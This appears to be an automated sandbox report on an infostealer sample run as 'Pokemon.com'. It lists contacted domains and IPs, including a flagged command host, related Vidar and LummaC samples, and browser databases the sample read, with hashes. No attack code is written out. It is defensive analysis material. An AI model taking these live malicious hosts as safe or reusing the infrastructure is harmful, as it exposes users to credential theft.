                                                                                                                                                                        https://labs.google.com/search?source=ntpchrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2669760383.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670976589.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://drive-daily-5.corp.gochrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://anglebug.com/5901chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://anglebug.com/3965chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://anglebug.com/7161chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://anglebug.com/7162chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/5906chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2774531474.00005C840037C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://anglebug.com/2517chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://permanently-removed.invalid/MergeSessionmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://anglebug.com/4937chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://issuetracker.google.com/166809097chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2714428198.00007C1C00DEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://fa5lt.xyztosh;Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3076149953.00000000042AC000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://lens.google.com/v3/uploadchrome.exe, 00000010.00000003.2618297777.00001B040087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703743350.00001B04008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632061196.00007C1C003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2632631737.00007C1C0120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  http://anglebug.com/3832chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://www.google.comAccess-Control-Allow-Credentials:chrome.exe, 00000010.00000003.2649479606.00007C1C002A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649516669.00007C1C0135C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://drive-daily-0.corp.google.com/chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://permanently-removed.invalid/Logoutmsedge.exe, 00000014.00000003.2773334490.00005C8400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://optimizatgoogs.cm/downlMIZATIONchrome.exe, 00000010.00000002.2709791438.00007C1C008AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
IP | Domain | Country | ASN | ASN Name | Malicious
20.189.173.1 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
149.154.167.99 | t.me | United Kingdom | 62041 | TELEGRAMRU | false
108.139.47.92 | unknown | United States | 16509 | AMAZON-02US | false
142.250.181.68 | www.google.com | United States | 15169 | GOOGLEUS | false
20.110.205.119 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
204.79.197.219 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
142.250.181.65 | googlehosted.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false
23.200.88.9 | unknown | United States | 16625 | AKAMAI-ASUS | false
172.64.41.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false
23.57.90.143 | unknown | United States | 35994 | AKAMAI-ASUS | false
23.57.90.145 | unknown | United States | 35994 | AKAMAI-ASUS | false
116.203.8.178 | fa5lt.xyz | Germany | 24940 | HETZNER-ASDE | true
23.57.90.162 | unknown | United States | 35994 | AKAMAI-ASUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false

IP
192.168.2.5
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581382
Start date and time: 2024-12-27 14:45:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 55s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: JA7cOAGHym.exe
renamed because original name is a hash value
Original Sample Name: 6e90f0e42285206dce01ffbbd748b081.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@89/290@21/16
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 78
• Number of non-executed functions: 300
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted)
• Excluded domains from analysis (whitelisted)
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Report size getting too big, too many NtWriteFile calls found.
• Report size getting too big, too many NtWriteVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 08:45:56 | API Interceptor | 1x Sleep call for process: JA7cOAGHym.exe modified |
| 08:46:02 | API Interceptor | 7x Sleep call for process: Pokemon.com modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 20.189.173.1 | Fw 2025 Employee Handbook For all Colhca Employees Ref THEFUE.eml | malicious | Unknown | |
| | JHPvqMzKbz.exe | malicious | Vidar | |
| | c20346ef.msg | malicious | Unknown | |
| | https://url.uk.m.mimecastprotect.com/s/879wCp9pjInpwnDHPf7CG_Zsy?domain=aerographicsut-my.sharepoint.com | malicious | HTMLPhisher | |
| | Aisha C. Yetman shared you a document..msg | malicious | Unknown | |
| | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s/%E2%80%8Bcd%C2%ADlsao%C2%ADmja%C2%ADte%C2%AD.h%C2%ADi%E2%80%8Ba%C2%ADz%C2%ADw%E2%80%8B.i%C2%ADr%2F.well-know%2Fre%2F1781008251/amVzc2ljYS5tZWFyc0BwZXJzaW1tb25ob21lcy5jb20= | malicious | Unknown | |
| | https://abex.co.in/1/?clickid=crj4hrne79is73f9g3kg&lp_key=17263275da2fd8c1a244a24d3218001b69e7968282&t1=1083194587&t2=.us.05.desktop.nonadult.windows.edge&key=7dfcf14e88e3f6336162# | malicious | Unknown | |
| | i45qm2Cawa | malicious | Unknown | |
| | https://homedigital.cloud/YoM8n6uU7J/.d7g/3Ugx2oDrh4/aGVscGRlc2tAZ290ZWNobm9sb2dpeC5jb20= | malicious | HTMLPhisher | |
| | Quarantined Messages(6).zip | malicious | HTMLPhisher | |
| 149.154.167.99 | http://xn--r1a.website/s/ogorodru | malicious | Unknown | telegram.org/img/favicon.ico |
| | http://cryptorabotakzz.com/ | malicious | Unknown | telegram.org/ |
| | http://cache.netflix.com.id1.wuush.us.kg/ | malicious | Unknown | telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217 |
| | http://investors.spotify.com.sg2.wuush.us.kg/ | malicious | Unknown | telegram.org/ |
| | http://bekaaviator.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegramtw1.org/ | malicious | Unknown | telegram.org/?setln=pl |
| | http://makkko.kz/ | malicious | Unknown | telegram.org/ |
| | http://telegram.dog | malicious | Unknown | telegram.dog/ |
| | LnSNtO8JIa.exe | malicious | Cinoshi Stealer | t.me/cinoshibot |
| | jtfCFDmLdX.exe | malicious | Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT | t.me/cinoshibot |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| t.me | https://linkenbio.net/59125/247 | malicious | Unknown | 149.154.167.99 |
| | aD7D9fkpII.exe | malicious | Vidar | 149.154.167.99 |
| | installer.bat | malicious | Vidar | 149.154.167.99 |
| | skript.bat | malicious | Vidar | 149.154.167.99 |
| | din.exe | malicious | Vidar | 149.154.167.99 |
| | yoda.exe | malicious | Vidar | 149.154.167.99 |
| | lem.exe | malicious | Vidar | 149.154.167.99 |
| | script.ps1 | malicious | Vidar | 149.154.167.99 |
| | HVlonDQpuI.exe | malicious | Vidar | 149.154.167.99 |
| | PodcastsTries.exe | malicious | Vidar | 149.154.167.99 |
| chrome.cloudflare-dns.com | aD7D9fkpII.exe | malicious | Vidar | 172.64.41.3 |
| | installer.bat | malicious | Vidar | 172.64.41.3 |
| | skript.bat | malicious | Vidar | 162.159.61.3 |
| | din.exe | malicious | Vidar | 172.64.41.3 |
| | lem.exe | malicious | Vidar | 162.159.61.3 |
| | WRD1792.docx.doc | malicious | Dynamer | 162.159.61.3 |
| | HVlonDQpuI.exe | malicious | Vidar | 172.64.41.3 |
| | PodcastsTries.exe | malicious | Vidar | 162.159.61.3 |
| | https://jkqbjwq.maxiite.com | malicious | HTMLPhisher | 172.64.41.3 |
| | ChoForgot.exe | malicious | Vidar | 172.64.41.3 |
| bg.microsoft.map.fastly.net | wp.bat | malicious | Unknown | 199.232.210.172 |
| | final.exe | malicious | Meterpreter | 199.232.214.172 |
| | n5Szx8qsFB.lnk | malicious | Unknown | 199.232.214.172 |
| | A4FY1OA97K.lnk | malicious | DanaBot | 199.232.214.172 |
| | vreFmptfUu.lnk | malicious | DanaBot | 199.232.210.172 |
| | 54861 Proforma Invoice AMC2273745.xlam.xlsx | malicious | Unknown | 199.232.214.172 |
| | 6ee7HCp9cD.exe | malicious | Quasar | 199.232.214.172 |
                                                                                                                                                                                                                                                                C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                P9UXlizXVS.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                Setup64v4.1.9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 116.203.8.178
                                                                                                                                                                                                                                                                • 149.154.167.99
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\208079\Pokemon.com | appFile.exe | malicious | LummaC Stealer
 | FloydMounts.exe | malicious | LummaC Stealer
 | installer.bat | malicious | Vidar
 | skript.bat | malicious | Vidar
 | din.exe | malicious | Vidar
 | yoda.exe | malicious | Vidar
 | lem.exe | malicious | Vidar
 | script.ps1 | malicious | Vidar
 | installer_1.05_36.4.zip | malicious | NetSupport RAT, LummaC, LummaC Stealer
 | Set-up.exe | malicious | LummaC
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):155648
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                    MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                    SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                    SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                    SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.08438200565341271
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v4U:51zkVmvQhyn+Zoz67NU
                                                                                                                                                                                                                                                                                    MD5:F7EEE7B0D281E250D1D8E36486F5A2C3
                                                                                                                                                                                                                                                                                    SHA1:309736A27E794672BD1BDFBAC69B2C6734FC25CE
                                                                                                                                                                                                                                                                                    SHA-256:378DD46FE8A8AAC2C430AE8A7C5C1DC3C2A343534A64A263EC9A4F1CE801985E
                                                                                                                                                                                                                                                                                    SHA-512:CE102A41CA4E2A27CCB27F415D2D69A75A0058BA0F600C23F63B89F30FFC982BA48336140714C522B46CC6D13EDACCE3DF0D6685D02844B8DB0AD3378DB9CABB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                    MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                    SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                    SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                    SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                    MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                    SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                    SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                    SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
Size (bytes):51200
Entropy (8bit):0.8746135976761988
Encrypted:false
SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:9E68EA772705B5EC0C83C2A97BB26324
SHA1:243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:false
Preview:SQLite format 3......@ ...

Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:dropped
Size (bytes):196608
Entropy (8bit):1.265343899664204
Encrypted:false
SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum0:Bq+n0JX9ELyKOMq+8y9/Owr
MD5:30F72208E8643B2A6F79AA94A1576084
SHA1:082D95A9E8C064A535B0F0AC8E8E1200A4B3E4C1
SHA-256:D9D596EA9F42475B8D92381C33616E86D1C43A50D734EBE2A5035063B72F2D26
SHA-512:728C8D718351ADEC4205072BB2FB63781C8FA848F8DC35930F931AF236084ABD4BA788DE59C060114391CD1AD6F179FE42087F9F11DFA48010CDDAA243EAA9FF
Malicious:false
Preview:SQLite format 3......@ ...

Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:false
Preview:SQLite format 3......@ ...

Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ...

Process:C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.136413900497188
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:429F49156428FD53EB06FC82088FD324
SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:false
Preview:SQLite format 3......@ ...

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):44137
Entropy (8bit):6.090762801856725
Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
MD5:0334AF84CB7F9431110C043D7C82B9A4
SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):45886
Entropy (8bit):6.08783521658406
Encrypted:false
SSDEEP:768:WMkbJrT8IeQc5d9IlKushDO6vP6O2cwAI16Lrf6YPAIf9N2aPiCAoYGoup1Xl3jn:WMk1rT8H19IF6W698aPiRoYhu3VlXr4y
MD5:B4ECF5A60F8C43F197E706519F56E3C0
SHA1:13CC7C7E943FDE5C0D3231B9AB39C574FDF67B9D
SHA-256:746598CB2253911E9C5AB66C9AEA7E4290CEB6CB1F55D45301101E3538D21CE1
SHA-512:DBB90CA72B89BEFD856F45348F1EA2B7717C59F22A0C72D9AC146A7A91326676C893258725DE388C4790F28974E55B1840B36495D8888AE844156173AE017A62
Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735307236"},"domain_actions_config":"
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):44608
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.096343830118719
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB3wufhDO6vP6O2cwAI16XidTyFBcF/BcGoup1Xl34:z/Ps+wsI7ynE+6W7chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:E29C801BEC9FC55B4C63775DBA84A2F3
                                                                                                                                                                                                                                                                                    SHA1:B9AC34D344D862252478DBC803CE801850612EEA
                                                                                                                                                                                                                                                                                    SHA-256:F33B79390DA52EE9A4E9F80973C01A56163ED100386AB4CA2E6568CA389E82F1
